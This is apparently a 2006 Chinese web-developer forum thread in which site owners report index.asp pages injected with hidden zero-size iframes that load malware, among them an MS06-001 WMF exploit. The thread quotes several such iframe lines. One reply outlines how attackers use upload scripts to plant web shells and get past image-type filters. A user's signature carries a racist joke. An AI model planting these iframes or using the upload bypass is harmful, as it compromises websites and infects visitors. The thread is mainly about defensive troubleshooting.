28,391
社区成员
发帖
与我相关
我的任务
分享网站被修改了,怎么办啊,急啊!!!!!!
我的网站打开首页就提示有病毒,经过仔细查看发现index.asp被人家修改了,怎么办啊
这个难道就是传说中的有漏洞,但不知道怎么处理啊,大家帮我看看啊,
index.asp
.....
<iframe src="http://220.189.248.130/webinfo/school/gczx/dll/mi/andyower.htm" width="0" height="0"></iframe>
这段代码是别人加的,我本来是没有这段代码的
这个难道就是传说中的有漏洞,但不知道怎么处理啊,大家帮我看看啊,
index.asp
.....
<iframe src="http://220.189.248.130/webinfo/school/gczx/dll/mi/andyower.htm" width="0" height="0"></iframe>
这段代码是别人加的,我本来是没有这段代码的
...全文
请发表友善的回复…
发表回复
lymyx 2006-02-24
- 打赏
- 举报
我也遇到了。
<iframe src=http://58.251.64.54/7/7.htm width=0 height=0></iframe>
<iframe src=http://www.898977.com/g/index.htm width=0 height=0></iframe>
在你的网页里面加上此类代码,直接调用的就是病毒。唉。
一般有2种方法可以这样实现:
1.服务器安全性比较差,容易攻入,把服务器上的所有网站,一一修改。
这是服务商的原因。
2.本身咱们的程序有漏洞,一般咱们的网站上都有 上传图片的程序如UPFILE.ASP,UPLOAD.ASP无组件上传,此类程序一般都有漏洞,他们利用此漏洞,先上传小木马,然后再上传大马,有:ASP站长助手或直接上传海洋木马。
上传了 ASP站长助手后,就可以在线编辑网页源码,可以直接插入代码。
海洋木马不仅可以改,而且还可以把整个网站源码打包,压缩成.mdb文件,直接下载下来。
有人会说UPFILE.ASP,UPLOAD.ASP是作了限制,比如登录方可使用或是只能上传图片格式的文件。这方面可以突破限制的,我们可以先到此程序路径,然后在浏览器直接打开WSockExpert.exe文件,或使用NC工具,可以绕过去。木马先把扩展名改成图片格式的后缀,上传成功后,再用NC改过来。
<iframe src=http://58.251.64.54/7/7.htm width=0 height=0></iframe>
<iframe src=http://www.898977.com/g/index.htm width=0 height=0></iframe>
在你的网页里面加上此类代码,直接调用的就是病毒。唉。
一般有2种方法可以这样实现:
1.服务器安全性比较差,容易攻入,把服务器上的所有网站,一一修改。
这是服务商的原因。
2.本身咱们的程序有漏洞,一般咱们的网站上都有 上传图片的程序如UPFILE.ASP,UPLOAD.ASP无组件上传,此类程序一般都有漏洞,他们利用此漏洞,先上传小木马,然后再上传大马,有:ASP站长助手或直接上传海洋木马。
上传了 ASP站长助手后,就可以在线编辑网页源码,可以直接插入代码。
海洋木马不仅可以改,而且还可以把整个网站源码打包,压缩成.mdb文件,直接下载下来。
有人会说UPFILE.ASP,UPLOAD.ASP是作了限制,比如登录方可使用或是只能上传图片格式的文件。这方面可以突破限制的,我们可以先到此程序路径,然后在浏览器直接打开WSockExpert.exe文件,或使用NC工具,可以绕过去。木马先把扩展名改成图片格式的后缀,上传成功后,再用NC改过来。
Abely2 2006-02-24
- 打赏
- 举报
我的也是,www.xde6.com
只看远方 2006-02-24
- 打赏
- 举报
木马和病毒的可能性最大,如果程序是自己写的,根据日期一个一个查吧,肯定要找到,还有看看是不是有上传漏洞,特别是在论坛里面
smartqu 2006-02-24
- 打赏
- 举报
能不能给一个好的解决办法啊?
life360 2006-02-24
- 打赏
- 举报
计算机中了病毒就会写上的。估计是服务器中病毒了
都被占用想不到好的了 2006-02-24
- 打赏
- 举报
关注一下
dabtd 2006-02-24
- 打赏
- 举报
mark
cen123 2006-02-24
- 打赏
- 举报
mark
凯晰叶子 2006-02-24
- 打赏
- 举报
这个是系统漏洞的问题,微软已经有补丁出来了!打上就可以了
===============、
被嵌入的代码为:<iframe src=http://202.108.59.245/images/ms.htm width=0 height=0></iframe> 进入主页,会自动下载一个mm.wmf文件,如果windows系统存在MS0601漏洞,会自动运行文件,病毒名称为Exploit.Win32.IMG-WMF.u的Exploit类黒客后门木马 据国外媒体消息,本周三,多个安全公司发出警告称,运行Windows XP和Windows Server 2003系统而且进行了完全修复的电脑会轻易地黑客攻击。 安全公司证实,上述系统中新发现的破坏文件.WMF图像文件漏洞会导致黑客的攻击。安全公司把这种漏洞称为"零日",因为恶意的攻击者能很好地利用这种没有补丁的漏洞。在感染的系统上,黑客可以运行代码,即使进行了安全修复的系统也可能会受到攻击。 目前,安全公司警告,如果用户不采取如下的举措,就有可能遭受攻击,即访问恶意网站、在Windows图像和传真浏览器中打开恶意的.WMF文件、或是在Windows浏览器中预览恶意的.WMF文件等。 据VeriSign公司的快速反应小组主管Ken Dunham称,如果恶意的攻击者发现新的自动攻击手段,比如使用电子邮件、及时信息或是文件共享等形式,此类攻击活动会进一步增长。 他指出,目前被感染的电脑受到的攻击活动仅限于安装广告软件和间谍软件的层面,但是,在未来的几天内会看到特洛伊木马和更多的恶意代码开发和出现。目前,尚没有针对这种漏洞的安全补丁,他建设一些工作区把.WMF文件设为禁止状态。首先,用户可以点击任务栏的工具按钮,然后点击运行,输入"regsvr32 -u %windir%/system32/shimgvw.dll",在出现改变对话框时点击确认。 他警告,目前出现的针对.WMF的漏洞还包括.EMF文件。目前为止,通过禁止WMF文件功能可以减缓针对 Windows XP/2003的攻击行为。微软公司正在对Windows中出现的可能漏洞进行调查。微软公司公关部门的发言人Waggener Edstrom称:"经过调查后,微软将采取适当的措施保护用户的安全,措施可能会包括通过月度修复升级或是发布安全建议等,这主要取决于用户的需求。" 同时,微软建议用户采用公司的安全建议。认为自己的电脑被感染的用户可以与微软的产品支持小组取得联系。这名分析师把此漏洞列为"重要级",而 Secunia则列为"极度严重级",赛门铁克公司把这一漏洞列为"二级"威胁,"四级"是最为严重的威胁。Secunia指出,Windows Server 2003数据中心版、 Windows Server 2003企业版、Windows Server 2003标准版、Windows Server 2003网络版、 Windows XP家庭版和Windows XP专业版都存在这种漏洞。 怕辣的四川人(171159599) 19:42:10 关于页被篡改! 由于有不良人员篡改我们网站首页,请于2月11日,19:44后20点56前访问我们论坛的朋友,及时给自己的计算机检查病毒,以免造成更多损失,为此,给你带来的麻烦,我们深表歉意。对此,对不死鹰王表示感谢,及时发现问题! 被嵌入的代码为:<iframe src=http://202.108.59.245/images/ms.htm width=0 height=0></iframe> 进入主页,会自动下载一个mm.wmf文件,如果windows系统存在MS0601漏洞,会自动运行文件,病毒名称为Exploit.Win32.IMG-WMF.u的Exploit类黒客后门木马 据国外媒体消息,本周三,多个安全公司发出警告称,运行Windows XP和Windows Server 2003系统而且进行了完全修复的电脑会轻易地黑客攻击。 安全公司证实,上述系统中新发现的破坏文件.WMF图像文件漏洞会导致黑客的攻击。安全公司把这种漏洞称为"零日",因为恶意的攻击者能很好地利用这种没有补丁的漏洞。在感染的系统上,黑客可以运行代码,即使进行了安全修复的系统也可能会受到攻击。 目前,安全公司警告,如果用户不采取如下的举措,就有可能遭受攻击,即访问恶意网站、在Windows图像和传真浏览器中打开恶意的.WMF文件、或是在Windows浏览器中预览恶意的.WMF文件等。 据VeriSign公司的快速反应小组主管Ken Dunham称,如果恶意的攻击者发现新的自动攻击手段,比如使用电子邮件、及时信息或是文件共享等形式,此类攻击活动会进一步增长。 他指出,目前被感染的电脑受到的攻击活动仅限于安装广告软件和间谍软件的层面,但是,在未来的几天内会看到特洛伊木马和更多的恶意代码开发和出现。目前,尚没有针对这种漏洞的安全补丁,他建设一些工作区把.WMF文件设为禁止状态。首先,用户可以点击任务栏的工具按钮,然后点击运行,输入"regsvr32 -u %windir%/system32/shimgvw.dll",在出现改变对话框时点击确认。 他警告,目前出现的针对.WMF的漏洞还包括.EMF文件。目前为止,通过禁止WMF文件功能可以减缓针对 Windows XP/2003的攻击行为。微软公司正在对Windows中出现的可能漏洞进行调查。微软公司公关部门的发言人Waggener Edstrom称:"经过调查后,微软将采取适当的措施保护用户的安全,措施可能会包括通过月度修复升级或是发布安全建议等,这主要取决于用户的需求。" 同时,微软建议用户采用公司的安全建议。认为自己的电脑被感染的用户可以与微软的产品支持小组取得联系。这名分析师把此漏洞列为"重要级",而 Secunia则列为"极度严重级",赛门铁克公司把这一漏洞列为"二级"威胁,"四级"是最为严重的威胁。Secunia指出,Windows Server 2003数据中心版、 Windows Server 2003企业版、Windows Server 2003标准版、Windows Server 2003网络版、 Windows XP家庭版和Windows XP专业版都存在这种漏洞。
打补本:http://www.microsoft.com/china/technet/security/bulletin/ms06-001.mspx
===============、
被嵌入的代码为:<iframe src=http://202.108.59.245/images/ms.htm width=0 height=0></iframe> 进入主页,会自动下载一个mm.wmf文件,如果windows系统存在MS0601漏洞,会自动运行文件,病毒名称为Exploit.Win32.IMG-WMF.u的Exploit类黒客后门木马 据国外媒体消息,本周三,多个安全公司发出警告称,运行Windows XP和Windows Server 2003系统而且进行了完全修复的电脑会轻易地黑客攻击。 安全公司证实,上述系统中新发现的破坏文件.WMF图像文件漏洞会导致黑客的攻击。安全公司把这种漏洞称为"零日",因为恶意的攻击者能很好地利用这种没有补丁的漏洞。在感染的系统上,黑客可以运行代码,即使进行了安全修复的系统也可能会受到攻击。 目前,安全公司警告,如果用户不采取如下的举措,就有可能遭受攻击,即访问恶意网站、在Windows图像和传真浏览器中打开恶意的.WMF文件、或是在Windows浏览器中预览恶意的.WMF文件等。 据VeriSign公司的快速反应小组主管Ken Dunham称,如果恶意的攻击者发现新的自动攻击手段,比如使用电子邮件、及时信息或是文件共享等形式,此类攻击活动会进一步增长。 他指出,目前被感染的电脑受到的攻击活动仅限于安装广告软件和间谍软件的层面,但是,在未来的几天内会看到特洛伊木马和更多的恶意代码开发和出现。目前,尚没有针对这种漏洞的安全补丁,他建设一些工作区把.WMF文件设为禁止状态。首先,用户可以点击任务栏的工具按钮,然后点击运行,输入"regsvr32 -u %windir%/system32/shimgvw.dll",在出现改变对话框时点击确认。 他警告,目前出现的针对.WMF的漏洞还包括.EMF文件。目前为止,通过禁止WMF文件功能可以减缓针对 Windows XP/2003的攻击行为。微软公司正在对Windows中出现的可能漏洞进行调查。微软公司公关部门的发言人Waggener Edstrom称:"经过调查后,微软将采取适当的措施保护用户的安全,措施可能会包括通过月度修复升级或是发布安全建议等,这主要取决于用户的需求。" 同时,微软建议用户采用公司的安全建议。认为自己的电脑被感染的用户可以与微软的产品支持小组取得联系。这名分析师把此漏洞列为"重要级",而 Secunia则列为"极度严重级",赛门铁克公司把这一漏洞列为"二级"威胁,"四级"是最为严重的威胁。Secunia指出,Windows Server 2003数据中心版、 Windows Server 2003企业版、Windows Server 2003标准版、Windows Server 2003网络版、 Windows XP家庭版和Windows XP专业版都存在这种漏洞。 怕辣的四川人(171159599) 19:42:10 关于页被篡改! 由于有不良人员篡改我们网站首页,请于2月11日,19:44后20点56前访问我们论坛的朋友,及时给自己的计算机检查病毒,以免造成更多损失,为此,给你带来的麻烦,我们深表歉意。对此,对不死鹰王表示感谢,及时发现问题! 被嵌入的代码为:<iframe src=http://202.108.59.245/images/ms.htm width=0 height=0></iframe> 进入主页,会自动下载一个mm.wmf文件,如果windows系统存在MS0601漏洞,会自动运行文件,病毒名称为Exploit.Win32.IMG-WMF.u的Exploit类黒客后门木马 据国外媒体消息,本周三,多个安全公司发出警告称,运行Windows XP和Windows Server 2003系统而且进行了完全修复的电脑会轻易地黑客攻击。 安全公司证实,上述系统中新发现的破坏文件.WMF图像文件漏洞会导致黑客的攻击。安全公司把这种漏洞称为"零日",因为恶意的攻击者能很好地利用这种没有补丁的漏洞。在感染的系统上,黑客可以运行代码,即使进行了安全修复的系统也可能会受到攻击。 目前,安全公司警告,如果用户不采取如下的举措,就有可能遭受攻击,即访问恶意网站、在Windows图像和传真浏览器中打开恶意的.WMF文件、或是在Windows浏览器中预览恶意的.WMF文件等。 据VeriSign公司的快速反应小组主管Ken Dunham称,如果恶意的攻击者发现新的自动攻击手段,比如使用电子邮件、及时信息或是文件共享等形式,此类攻击活动会进一步增长。 他指出,目前被感染的电脑受到的攻击活动仅限于安装广告软件和间谍软件的层面,但是,在未来的几天内会看到特洛伊木马和更多的恶意代码开发和出现。目前,尚没有针对这种漏洞的安全补丁,他建设一些工作区把.WMF文件设为禁止状态。首先,用户可以点击任务栏的工具按钮,然后点击运行,输入"regsvr32 -u %windir%/system32/shimgvw.dll",在出现改变对话框时点击确认。 他警告,目前出现的针对.WMF的漏洞还包括.EMF文件。目前为止,通过禁止WMF文件功能可以减缓针对 Windows XP/2003的攻击行为。微软公司正在对Windows中出现的可能漏洞进行调查。微软公司公关部门的发言人Waggener Edstrom称:"经过调查后,微软将采取适当的措施保护用户的安全,措施可能会包括通过月度修复升级或是发布安全建议等,这主要取决于用户的需求。" 同时,微软建议用户采用公司的安全建议。认为自己的电脑被感染的用户可以与微软的产品支持小组取得联系。这名分析师把此漏洞列为"重要级",而 Secunia则列为"极度严重级",赛门铁克公司把这一漏洞列为"二级"威胁,"四级"是最为严重的威胁。Secunia指出,Windows Server 2003数据中心版、 Windows Server 2003企业版、Windows Server 2003标准版、Windows Server 2003网络版、 Windows XP家庭版和Windows XP专业版都存在这种漏洞。
打补本:http://www.microsoft.com/china/technet/security/bulletin/ms06-001.mspx
lymyx 2006-02-24
- 打赏
- 举报
那个工具提供的不错。
anwell 2006-02-24
- 打赏
- 举报
呵呵
ksn520 2006-02-24
- 打赏
- 举报
那个工具不错,查木马真方便
=====================================================
我最讨厌两种人:
一是有种族歧视的;
二是黑人;
三是不识数的!
=====================================================
我最讨厌两种人:
一是有种族歧视的;
二是黑人;
三是不识数的!
ecao 2006-02-24
- 打赏
- 举报
同情中,我的也中了。1. 到 ASPSecurity 官方网站下载 :ASPSecurity v1.0
2. 解压缩文件,然后把上传到服务器
3. 用管理员登录,密码:admin888,记得修改
ASPSecurity 官方网站 http://www.0x54.org
这个软件很好,可以帮你解决问题的
2. 解压缩文件,然后把上传到服务器
3. 用管理员登录,密码:admin888,记得修改
ASPSecurity 官方网站 http://www.0x54.org
这个软件很好,可以帮你解决问题的
star591 2006-02-24
- 打赏
- 举报
好
soft_2008 2006-02-24
- 打赏
- 举报
写文件是必须有权限的,先找一找服务器有什么漏洞,打好补丁,再用入注工具看看自己的WEB程序有没有比较突出的入注点,查找当中有没有ASP木马,核查IIS的权限设置,检测系统有没有可疑的木马程序,间碟程序。如果,服务器存在漏洞,而且不是自己管理的,要求管理方做好服务器安全工作,披露系统日志,以备核查。给WEB程序中加入访问日志记录功能,把IP,时间等信息记录在案,不要与后台挂钩。提升数据库安全等级,对数据进入加密。
_西瓜皮_ 2006-02-24
- 打赏
- 举报
学习.
yrs007 2006-02-24
- 打赏
- 举报
哈哈..这是网站有漏洞或是服务有漏洞.让别人有机可取,然后修改你的页面的...所以写程序的时候多注意...很多是SQL流入漏洞啊~~
ldstt 2006-02-23
- 打赏
- 举报
我的是昨天22号晚上10点20多被改的。很郁闷,我的asp只有简单的access操作,没有上传任何文件的功能,真是奇怪攻击者是怎么得到修改文件的权限的,如果不是ftp或整个主机被黑的话。我用的虚拟主机,但是联系了管理员说主机没有发现被攻击。如果真是我自己的问题出在哪里呢?
smartqu 2006-02-23
- 打赏
- 举报
tokilcoom(痴迷白骨)
把整站的写权限去掉会不会影响系统的使用呢,还有怎么去掉啊?
把整站的写权限去掉会不会影响系统的使用呢,还有怎么去掉啊?
batistutafans 2006-02-23
- 打赏
- 举报
我的也是,在同一天网站中所有的index.asp都在最后面加上象楼主那样的代码,真不知道是怎么回事,是因为论坛使用了上传功能才导致的吗?
加载更多回复(11)
